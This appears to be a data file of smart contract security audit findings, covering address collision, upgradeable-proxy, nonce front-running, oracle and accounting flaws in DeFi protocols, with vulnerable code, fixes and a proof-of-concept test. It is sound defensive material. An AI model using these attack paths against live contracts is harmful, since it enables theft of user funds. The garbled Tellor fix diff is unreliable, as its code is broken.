⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⣿⣿⣿⣿⡿⠃⠀⠙⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠁⠀⠀⠀⢻⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠘⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⠃⠀⠀⠀⠀⠈⢿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⣰⣿⣿⣿⡿⠋⠁⠀⠀⠈⠘⠹⣿⣿⣿⣿⣆⠀⠀⠀\\n// ⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡀⠀⠀\\n// ⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣟⠀⡀⢀⠀⡀⢀⠀⡀⢈⢿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⡇⠀⠀\\n// ⠀⠀⣠⣿⣿⣿⣿⣿⣿⡿⠋⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⡿⢿⠿⠿⠿⠿⠿⠿⠿⠿⠿⢿⣿⣿⣿⣷⡀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠸⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠂⠀⠀\\n// 
⠀⠀⠙⠛⠿⠻⠻⠛⠉⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣧⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⢻⣿⣿⣿⣷⣀⢀⠀⠀⠀⡀⣰⣾⣿⣿⣿⠏⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣧⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠹⢿⣿⣿⣿⣿⣾⣾⣷⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠙⠋⠛⠙⠋⠛⠙⠋⠛⠙⠋⠃⠀⠀⠀⠀⠀⠀⠀⠀⠠⠿⠻⠟⠿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⠟⠿⠟⠿⠆⠀⠸⠿⠿⠟⠯⠀⠀⠀⠸⠿⠿⠿⠏⠀⠀⠀⠀⠀⠈⠉⠻⠻⡿⣿⢿⡿⡿⠿⠛⠁⠀⠀⠀⠀⠀⠀\\n// allo.gitcoin.co\\n\\n/// @title Anchor contract\\n/// @author @thelostone-mc , @0xKurt , @codenamejason , @0xZakk , @nfrgosselin \\n/// @notice Anchors are associated with profiles and are accessible exclusively by the profile owner. This contract ensures secure\\n/// and authorized interaction with external addresses, enhancing the capabilities of profiles and enabling controlled\\n/// execution of operations. The contract leverages the `Registry` contract for ownership verification and access control.\\ncontract Anchor {\\n /// ==========================\\n /// === Storage Variables ====\\n /// ==========================\\n\\n /// @notice The registry contract on any given network/chain\\n Registry public immutable registry;\\n\\n /// @notice The profileId of the allowed profile to execute calls\\n bytes32 public immutable profileId;\\n\\n /// ==========================\\n /// ======== Errors ==========\\n /// ==========================\\n\\n /// @notice Throws when the caller is not the owner of the profile\\n error UNAUTHORIZED();\\n\\n /// @notice Throws when the call to the target address fails\\n error CALL_FAILED();\\n\\n /// ==========================\\n /// ======= Constructor ======\\n /// ==========================\\n\\n /// @notice Constructor\\n /// @dev We create an instance of the 'Registry' contract using the 'msg.sender' and set the profileId.\\n /// @param _profileId The ID of the allowed profile to execute calls\\n constructor(bytes32 _profileId) {\\n registry = Registry(msg.sender);\\n profileId = _profileId;\\n }\\n\\n /// ==========================\\n /// ======== External ========\\n /// ==========================\\n\\n /// 
@notice Execute a call to a target address\\n /// @dev 'msg.sender' must be profile owner\\n /// @param _target The target address to call\\n /// @param _value The amount of native token to send\\n /// @param _data The data to send to the target address\\n /// @return Data returned from the target address\\n function execute(address _target, uint256 _value, bytes memory _data) external returns (bytes memory) {\\n // Check if the caller is the owner of the profile and revert if not\\n if (!registry.isOwnerOfProfile(profileId, msg.sender)) revert UNAUTHORIZED();\\n\\n // Check if the target address is the zero address and revert if it is\\n if (_target == address(0)) revert CALL_FAILED();\\n\\n // Call the target address and return the data\\n (bool success, bytes memory data) = _target.call{value: _value}(_data);\\n\\n // Check if the call was successful and revert if not\\n if (!success) revert CALL_FAILED();\\n\\n return data;\\n }\\n\\n /// @notice This contract should be able to receive native token\\n receive() external payable {}\\n}\\n```\\n -UUPSUpgradeable vulnerability in OpenZeppelin ContractsчmediumчOpenzeppelin has found the critical severity bug in UUPSUpgradeable. The kyber-swap contracts has used both openzeppelin contracts as well as openzeppelin upgrabable contracts with version v4.3.1. 
This is confirmed from package.json.\\n```\\nFile: ks-elastic-sc/package.json\\n\\n \"@openzeppelin/contracts\": \"4.3.1\",\\n \"@openzeppelin/test-helpers\": \"0.5.6\",\\n \"@openzeppelin/contracts-upgradeable\": \"4.3.1\",\\n```\\n\\nThe `UUPSUpgradeable` vulnerability has been found in openzeppelin version as follows,\\n@openzeppelin/contracts : Affected versions >= 4.1.0 < 4.3.2 @openzeppelin/contracts-upgradeable : >= 4.1.0 < 4.3.2\\nHowever, openzeppelin has fixed this issue in versions 4.3.2\\nOpenzeppelin bug acceptance and fix: check here\\nThe following contracts has been affected due to this vulnerability\\nPoolOracle.sol\\nTokenPositionDescriptor.sol\\nBoth of these contracts are UUPSUpgradeable and the issue must be fixed.чUpdate the openzeppelin library to latest version.\\nCheck this openzeppelin security advisory to initialize the UUPS implementation contracts.\\nCheck this openzeppelin UUPS documentation.чUpgradeable contracts using UUPSUpgradeable may be vulnerable to an attack affecting uninitialized implementation contracts.ч```\\nFile: ks-elastic-sc/package.json\\n\\n \"@openzeppelin/contracts\": \"4.3.1\",\\n \"@openzeppelin/test-helpers\": \"0.5.6\",\\n \"@openzeppelin/contracts-upgradeable\": \"4.3.1\",\\n```\\n -Router.sol is vulnerable to address collissionчmediumчThe pool address check in the the callback function isn't strict enough and can suffer issues with collision. Due to the truncated nature of the create2 opcode the collision resistance is already impaired to 2^160 as that is total number of possible hashes after truncation. Obviously if you are searching for a single hash, this is (basically) impossible. The issue here is that one does not need to search for a single address as the router never verifies that the pool actually exists. 
This is the crux of the problem, but first let's do a little math as to why this is a problem.\\n$$ 1 - e ^ {-k(k-1) \\over 2N } $$\\nWhere k is the number of hash values and N is the number of possible hashes\\nFor very large numbers we can further approximate the exponent to:\\n$$ -k^2 \\over 2N $$\\nThis exponent is now trivial to solve for an approximate attack value which is:\\n$$ k = \\sqrt{2N} $$\\nIn our scenario N is 2^160 (our truncated keccak256) which means that our approximate attack value is 2^80 since we need to generate two sets of hashes. The first set is to generate 2^80 public addresses and the second is to generate pool address from variations in the pool specifics(token0, token1, fee). Here we reach a final attack value of 2^81 hashes. Using the provided calculator we see that 2^81 hashes has an approximate 86.4% chance of a collision. Increase that number to 2^82 and the odds of collision becomes 99.96%. In this case, a collision between addresses means breaking this check and draining the allowances of all users to a specific token. This is because the EOA address will collide with the supposed pool address allowing it to bypass the msg.sender check. Now we considered the specific of the contract.\\nRouter.sol#L47-L51\\n```\\nrequire(\\n msg.sender == address(_getPool(tokenIn, tokenOut, fee)),\\n 'Router: invalid callback sender'\\n);\\n```\\n\\nThe above snippet from the swapCallback function is used to verify that msg.sender is the address of the pool.\\nRouter.sol#L224-L231\\n```\\nfunction _getPool(\\n address tokenA,\\n address tokenB,\\n uint24 fee\\n) private view returns (IPool) {\\n return IPool(PoolAddress.computeAddress(factory, tokenA, tokenB, fee, poolInitHash));\\n}\\n```\\n\\nWe see that these lines never check with the factory that the pool exists or any of the inputs are valid in any way. token0 can be constant and we can achieve the variation in the hash by changing token1. 
The attacker could use token0 = WETH and vary token1. This would allow them to steal all allowances of WETH. Since allowances are forever until revoked, this could put hundreds of millions of dollars at risk.\\nAlthough this would require a large amount of compute it is already possible to break with current computing. Given the enormity of the value potentially at stake it would be a lucrative attack to anyone who could fund it. In less than a decade this would likely be a fairly easily attained amount of compute, nearly guaranteeing this attack.чVerify with the factory that msg.sender is a valid poolчAddress collision can cause all allowances to be drainedч```\\nrequire(\\n msg.sender == address(_getPool(tokenIn, tokenOut, fee)),\\n 'Router: invalid callback sender'\\n);\\n```\\n -Position value can fall below minimum acceptable quote value when partially closing positions requested to be closed in fullчmediumчIn `LibQuote.closeQuote` there is a requirement to have the remaining quote value to not be less than minAcceptableQuoteValue:\\n```\\nif (LibQuote.quoteOpenAmount(quote) != quote.quantityToClose) {\\n require(quote.lockedValues.total() >= symbolLayout.symbols[quote.symbolId].minAcceptableQuoteValue,\\n \"LibQuote: Remaining quote value is low\");\\n}\\n```\\n\\nNotice the condition when this require happens:\\n`LibQuote.quoteOpenAmount(quote)` is remaining open amount\\n`quote.quantityToClose` is requested amount to close\\nThis means that this check is ignored if partyA has requested to close amount equal to full remaining quote value, but enforced when it's not (even if closing fully). For example, a quote with opened amount = 100 is requested to be closed in full (amount = 100): this check is ignored. 
But PartyB can fill the request partially, for example fill 99 out of 100, and the remainder (1) is not checked to conform to `minAcceptableQuoteValue`.\\nThe following execution paths are possible if PartyA has open position size = 100 and `minAcceptableQuoteValue` = 5:\\n`requestToClosePosition(99)` -> revert\\n`requestToClosePosition(100)` -> `fillCloseRequest(99)` -> pass (remaining quote = 1)чThe condition should be to ignore the `minAcceptableQuoteValue` if request is filled in full (filledAmount == quantityToClose):\\n```\\n- if (LibQuote.quoteOpenAmount(quote) != quote.quantityToClose) {\\n+ if (filledAmount != quote.quantityToClose) {\\n require(quote.lockedValues.total() >= symbolLayout.symbols[quote.symbolId].minAcceptableQuoteValue,\\n \"LibQuote: Remaining quote value is low\");\\n }\\n```\\nчThere can be multiple reasons why the protocol enforces `minAcceptableQuoteValue`, one of them might be the efficiency of the liquidation mechanism: when quote value is too small (and liquidation value too small too), liquidators will not have enough incentive to liquidate these positions in case they become insolvent. 
Both partyA and partyB might also not have enough incentive to close or respond to request to close such small positions, possibly resulting in a loss of funds and greater market risk for either user.\\nProof of Concept\\nAdd this to any test, for example to `ClosePosition.behavior.ts`.\\n```\\nit(\"Close position with remainder below minAcceptableQuoteValue\", async function () {\\n const context: RunContext = this.context;\\n\\n this.user_allocated = decimal(1000);\\n this.hedger_allocated = decimal(1000);\\n\\n this.user = new User(this.context, this.context.signers.user);\\n await this.user.setup();\\n await this.user.setBalances(this.user_allocated, this.user_allocated, this.user_allocated);\\n\\n this.hedger = new Hedger(this.context, this.context.signers.hedger);\\n await this.hedger.setup();\\n await this.hedger.setBalances(this.hedger_allocated, this.hedger_allocated);\\n\\n await this.user.sendQuote(limitQuoteRequestBuilder()\\n .quantity(decimal(100))\\n .price(decimal(1))\\n .cva(decimal(10)).lf(decimal(5)).mm(decimal(15))\\n .build()\\n );\\n await this.hedger.lockQuote(1, 0, decimal(5, 17));\\n await this.hedger.openPosition(1, limitOpenRequestBuilder().filledAmount(decimal(100)).openPrice(decimal(1)).price(decimal(1)).build());\\n\\n // now try to close full position (100)\\n await this.user.requestToClosePosition(\\n 1,\\n limitCloseRequestBuilder().quantityToClose(decimal(100)).closePrice(decimal(1)).build(),\\n );\\n\\n // now partyA cancels request\\n //await this.user.requestToCancelCloseRequest(1);\\n\\n // partyB can fill 99\\n await this.hedger.fillCloseRequest(\\n 1,\\n limitFillCloseRequestBuilder()\\n .filledAmount(decimal(99))\\n .closedPrice(decimal(1))\\n .build(),\\n );\\n\\n var q = await context.viewFacet.getQuote(1);\\n console.log(\"quote quantity: \" + q.quantity.div(decimal(1)) + \" closed: \" + q.closedAmount.div(decimal(1)));\\n\\n});\\n```\\n\\nConsole execution result:\\n```\\nquote quantity: 100 closed: 99\\n```\\nч```\\nif 
(LibQuote.quoteOpenAmount(quote) != quote.quantityToClose) {\\n require(quote.lockedValues.total() >= symbolLayout.symbols[quote.symbolId].minAcceptableQuoteValue,\\n \"LibQuote: Remaining quote value is low\");\\n}\\n```\\n -MultiAccount `depositAndAllocateForAccount` function doesn't scale the allocated amount correctly, failing to allocate enough fundsчmediumчInternal accounting (allocatedBalances) are tracked as fixed numbers with 18 decimals, while collateral tokens can have different amount of decimals. This is correctly accounted for in AccountFacet.depositAndAllocate:\\n```\\n AccountFacetImpl.deposit(msg.sender, amount);\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n AccountFacetImpl.allocate(amountWith18Decimals);\\n```\\n\\nBut it is treated incorrectly in MultiAccount.depositAndAllocateForAccount:\\n```\\n ISymmio(symmioAddress).depositFor(account, amount);\\n bytes memory _callData = abi.encodeWithSignature(\\n \"allocate(uint256)\",\\n amount\\n );\\n innerCall(account, _callData);\\n```\\n\\nThis leads to incorrect allocated amounts.чScale amount correctly before allocating it:\\n```\\n ISymmio(symmioAddress).depositFor(account, amount);\\n+ uint256 amountWith18Decimals = (amount * 1e18) /\\n+ (10 ** IERC20Metadata(collateral).decimals());\\n bytes memory _callData = abi.encodeWithSignature(\\n \"allocate(uint256)\",\\n- amount\\n+ amountWith18Decimals\\n );\\n innerCall(account, _callData);\\n```\\nчSimilar to 222 from previous audit contest, the user expects to have full amount deposited and allocated, but ends up with only dust amount allocated, which can lead to unexpected liquidations (for example, user is at the edge of liquidation, calls depositAndAllocate to improve account health, but is liquidated instead). 
For consistency reasons, since this is almost identical to 222, it should also be high.ч```\\n AccountFacetImpl.deposit(msg.sender, amount);\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n AccountFacetImpl.allocate(amountWith18Decimals);\\n```\\n -PartyBFacetImpl.chargeFundingRate should check whether quoteIds is empty array to prevent partyANonces from being increased, causing some operations of partyA to failчmediumч```\\nFile: symmio-core\\contracts\\facets\\PartyB\\PartyBFacetImpl.sol\\n function chargeFundingRate(\\n address partyA,\\n uint256[] memory quoteIds,\\n int256[] memory rates,\\n PairUpnlSig memory upnlSig\\n ) internal {\\n LibMuon.verifyPairUpnl(upnlSig, msg.sender, partyA);\\n require(quoteIds.length == rates.length, \"PartyBFacet: Length not match\");\\n int256 partyBAvailableBalance = LibAccount.partyBAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyB,\\n msg.sender,\\n partyA\\n );\\n int256 partyAAvailableBalance = LibAccount.partyAAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyA,\\n partyA\\n );\\n uint256 epochDuration;\\n uint256 windowTime;\\n for (uint256 i = 0; i < quoteIds.length; i++) {\\n// rest of code// rest of code//quoteIds is empty array, so code is never executed.\\n }\\n require(partyAAvailableBalance >= 0, \"PartyBFacet: PartyA will be insolvent\");\\n require(partyBAvailableBalance >= 0, \"PartyBFacet: PartyB will be insolvent\");\\n AccountStorage.layout().partyBNonces[msg.sender][partyA] += 1;\\n394:-> AccountStorage.layout().partyANonces[partyA] += 1;\\n }\\n```\\n\\nAs long as partyBAvailableBalance(L318) and partyAAvailableBalance(L323) are greater than or equal to 0, that is to say, PartyA and PartyB are solvent. 
Then, partyB can add 1 to `partyANonces[partyA]` at little cost which is the gas of tx.\\n```\\nFile: symmio-core\\contracts\\facets\\PartyA\\PartyAFacetImpl.sol\\n function forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n// rest of code// rest of code//assume codes here are executed\\n273:-> LibMuon.verifyPairUpnlAndPrice(upnlSig, quote.partyB, quote.partyA, quote.symbolId);\\n// rest of code// rest of code\\n }\\n```\\n\\nIf the current price goes against partyB, then partyB can front-run `forceClosePosition` and call `chargeFundingRate` to increase the nonces of both parties by 1. In this way, partyA's `forceClosePosition` will inevitably revert because the nonces are incorrect.ч```\\nFile: symmio-core\\contracts\\facets\\PartyB\\PartyBFacetImpl.sol\\n function chargeFundingRate(\\n address partyA,\\n uint256[] memory quoteIds,\\n int256[] memory rates,\\n PairUpnlSig memory upnlSig\\n ) internal {\\n LibMuon.verifyPairUpnl(upnlSig, msg.sender, partyA);\\n317:- require(quoteIds.length == rates.length, \"PartyBFacet: Length not match\");\\n317:+ require(quoteIds.length > 0 && quoteIds.length == rates.length, \"PartyBFacet: Length is 0 or Length not match\");\\n```\\nчDue to this issue, partyB can increase nonces of any partyA with little cost, causing some operations of partyA to fail (refer to the Vulnerability Detail section). 
This opens up the opportunity for partyB to turn the table.ч```\\nFile: symmio-core\\contracts\\facets\\PartyB\\PartyBFacetImpl.sol\\n function chargeFundingRate(\\n address partyA,\\n uint256[] memory quoteIds,\\n int256[] memory rates,\\n PairUpnlSig memory upnlSig\\n ) internal {\\n LibMuon.verifyPairUpnl(upnlSig, msg.sender, partyA);\\n require(quoteIds.length == rates.length, \"PartyBFacet: Length not match\");\\n int256 partyBAvailableBalance = LibAccount.partyBAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyB,\\n msg.sender,\\n partyA\\n );\\n int256 partyAAvailableBalance = LibAccount.partyAAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyA,\\n partyA\\n );\\n uint256 epochDuration;\\n uint256 windowTime;\\n for (uint256 i = 0; i < quoteIds.length; i++) {\\n// rest of code// rest of code//quoteIds is empty array, so code is never executed.\\n }\\n require(partyAAvailableBalance >= 0, \"PartyBFacet: PartyA will be insolvent\");\\n require(partyBAvailableBalance >= 0, \"PartyBFacet: PartyB will be insolvent\");\\n AccountStorage.layout().partyBNonces[msg.sender][partyA] += 1;\\n394:-> AccountStorage.layout().partyANonces[partyA] += 1;\\n }\\n```\\n -Stat calculator returns incorrect report for swETHчhighчThe purpose of the in-scope `SwEthEthOracle` contract is to act as a price oracle specifically for swETH (Swell ETH) per the comment in the contract below and the codebase's README\\n```\\nFile: SwEthEthOracle.sol\\n/**\\n * @notice Price oracle specifically for swEth (Swell Eth).\\n * @dev getPriceEth is not a view fn to support reentrancy checks. 
Does not actually change state.\\n */\\ncontract SwEthEthOracle is SystemComponent, IPriceOracle {\\n```\\n\\nPer the codebase in the contest repository, the price oracle for the swETH is understood to be configured to the `SwEthEthOracle` contract at Line 252 below.\\n```\\nFile: RootOracleIntegrationTest.t.sol\\n swEthOracle = new SwEthEthOracle(systemRegistry, IswETH(SWETH_MAINNET));\\n..SNIP..\\n // Lst special pricing case setup\\n // priceOracle.registerMapping(SFRXETH_MAINNET, IPriceOracle(address(sfrxEthOracle)));\\n priceOracle.registerMapping(WSTETH_MAINNET, IPriceOracle(address(wstEthOracle)));\\n priceOracle.registerMapping(SWETH_MAINNET, IPriceOracle(address(swEthOracle)));\\n```\\n\\nThus, in the context of this audit, the price oracle for the swETH is mapped to the `SwEthEthOracle` contract.\\nBoth the swETH oracle and calculator use the same built-in `swEth.swETHToETHRate` function to retrieve the price of swETH in ETH.\\nLST Oracle Calculator Rebasing\\nswETH SwEthEthOracle - `swEth.swETHToETHRate()` SwethLSTCalculator - `IswETH(lstTokenAddress).swETHToETHRate()` False\\n```\\nFile: SwEthEthOracle.sol\\n /// @inheritdoc IPriceOracle\\n function getPriceInEth(address token) external view returns (uint256 price) {\\n..SNIP..\\n // Returns in 1e18 precision.\\n price = swEth.swETHToETHRate();\\n }\\n```\\n\\n```\\nFile: SwethLSTCalculator.sol\\n function calculateEthPerToken() public view override returns (uint256) {\\n return IswETH(lstTokenAddress).swETHToETHRate();\\n }\\n```\\n\\nWithin the `LSTCalculatorBase.current` function, assume that the `swEth.swETHToETHRate` function returns $x$ when called. In this case, the `price` at Line 203 below and `backing` in Line 210 below will be set to $x$ since the `getPriceInEth` and `calculateEthPerToken` functions depend on the same `swEth.swETHToETHRate` function internally. 
Thus, `priceToBacking` will always be 1e18:\\n$$ \\begin{align} priceToBacking &= \\frac{price \\times 1e18}{backing} \\ &= \\frac{x \\times 1e18}{x} \\ &= 1e18 \\end{align} $$\\nSince `priceToBacking` is always 1e18, the `premium` will always be zero:\\n$$ \\begin{align} premium &= priceToBacking - 1e18 \\ &= 1e18 - 1e18 \\ &= 0 \\end{align} $$\\nAs a result, the calculator for swETH will always report the wrong statistic report for swETH. If there is a premium or discount, the calculator will wrongly report none.\\n```\\nFile: LSTCalculatorBase.sol\\n function current() external returns (LSTStatsData memory) {\\n..SNIP..\\n IRootPriceOracle pricer = systemRegistry.rootPriceOracle();\\n uint256 price = pricer.getPriceInEth(lstTokenAddress);\\n..SNIP..\\n uint256 backing = calculateEthPerToken();\\n // price is always 1e18 and backing is in eth, which is 1e18\\n priceToBacking = price * 1e18 / backing;\\n }\\n\\n // positive value is a premium; negative value is a discount\\n int256 premium = int256(priceToBacking) - 1e18;\\n\\n return LSTStatsData({\\n lastSnapshotTimestamp: lastSnapshotTimestamp,\\n baseApr: baseApr,\\n premium: premium,\\n slashingCosts: slashingCosts,\\n slashingTimestamps: slashingTimestamps\\n });\\n }\\n```\\nчWhen handling the swETH within the `LSTCalculatorBase.current` function, consider other methods of obtaining the fair market price of swETH that do not rely on the `swEth.swETHToETHRate` function such as external 3rd-party price oracle.чThe purpose of the stats/calculators contracts is to store, augment, and clean data relevant to the LMPs. When the solver proposes a rebalance, the strategy uses the stats contracts to calculate a composite return (score) for the proposed destinations. 
Using that composite return, it determines if the swap is beneficial for the vault.\\nIf a stat calculator provides inaccurate information, it can cause multiple implications that lead to losses to the protocol, such as false signals allowing the unprofitable rebalance to be executed.ч```\\nFile: SwEthEthOracle.sol\\n/**\\n * @notice Price oracle specifically for swEth (Swell Eth).\\n * @dev getPriceEth is not a view fn to support reentrancy checks. Does not actually change state.\\n */\\ncontract SwEthEthOracle is SystemComponent, IPriceOracle {\\n```\\n -Incorrect approach to tracking the PnL of a DVчhighчLet $DV_A$ be a certain destination vault.\\nAssume that at $T0$, the current debt value (currentDvDebtValue) of $DV_A$ is 95 WETH, and the last debt value (updatedDebtBasis) is 100 WETH. Since the current debt value has become smaller than the last debt value, the vault is making a loss of 5 WETH since the last rebalancing, so $DV_A$ is sitting at a loss, and users can only burn a limited amount of DestinationVault_A's shares.\\nAssume that at $T1$, there is some slight rebalancing performed on $DV_A$, and a few additional LP tokens are deposited to it. Thus, its current debt value increased to 98 WETH. At the same time, the `destInfo.debtBasis` and `destInfo.ownedShares` will be updated to the current value.\\nImmediately after the rebalancing, $DV_A$ will not be considered sitting in a loss since the `currentDvDebtValue` and `updatedDebtBasis` should be equal now. As a result, users could now burn all the $DV_A$ shares of the LMPVault during withdrawal.\\n$DV_A$ suddenly becomes not sitting at a loss even though the fact is that it is still sitting at a loss of 5 WETH. The loss has been written off.\\n```\\nFile: LMPDebt.sol\\n // Neither of these numbers include rewards from the DV\\n if (currentDvDebtValue < updatedDebtBasis) {\\n // We are currently sitting at a loss. 
Limit the value we can pull from\\n // the destination vault\\n currentDvDebtValue = currentDvDebtValue.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n currentDvShares = currentDvShares.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n }\\n```\\nчConsider a more sophisticated approach to track a DV's Profit and Loss (PnL).\\nIn our example, $DV_A$ should only be considered not making a loss if the price of the LP tokens starts to appreciate and cover the loss of 5 WETH.чA DV might be incorrectly marked as not sitting in a loss, thus allowing users to burn all the DV shares, locking in all the loss of the DV and the vault shareholders.ч```\\nFile: LMPDebt.sol\\n // Neither of these numbers include rewards from the DV\\n if (currentDvDebtValue < updatedDebtBasis) {\\n // We are currently sitting at a loss. Limit the value we can pull from\\n // the destination vault\\n currentDvDebtValue = currentDvDebtValue.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n currentDvShares = currentDvShares.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n }\\n```\\n -Price returned by Oracle is not verifiedчmediumчAs per the example provided by Tellor on how to integrate the Tellor oracle into the system, it has shown the need to check that the price returned by the oracle is not zero.\\n```\\nfunction getTellorCurrentValue(bytes32 _queryId)\\n ..SNIP..\\n // retrieve most recent 20+ minute old value for a queryId. the time buffer allows time for a bad value to be disputed\\n (, bytes memory data, uint256 timestamp) = tellor.getDataBefore(_queryId, block.timestamp - 20 minutes);\\n uint256 _value = abi.decode(data, (uint256));\\n if (timestamp == 0 || _value == 0) return (false, _value, timestamp);\\n```\\n\\nThus, the value returned from the `getDataBefore` function should be verified to ensure that the price returned by the oracle is not zero. 
However, this was not implemented.\\n```\\nFile: TellorOracle.sol\\n function getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n }\\n```\\nчUpdate the affected function as follows.\\n```\\nfunction getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp // Remove the line below\\n 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? 
DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n// Remove the line below\\n if (timestampRetrieved == 0 || timestamp // Remove the line below\\n timestampRetrieved > tokenPricingTimeout) {\\n// Add the line below\\n if (timestampRetrieved == 0 || value == 0 || timestamp // Remove the line below\\n timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n}\\n```\\nчThe protocol relies on the oracle to provide accurate pricing for many critical operations, such as determining the debt values of DV, calculators/stats used during the rebalancing process, NAV/shares of the LMPVault, and determining how much assets the users should receive during withdrawal.\\nIf an incorrect value of zero is returned from Tellor, affected assets within the protocol will be considered worthless.ч```\\nfunction getTellorCurrentValue(bytes32 _queryId)\\n ..SNIP..\\n // retrieve most recent 20+ minute old value for a queryId. 
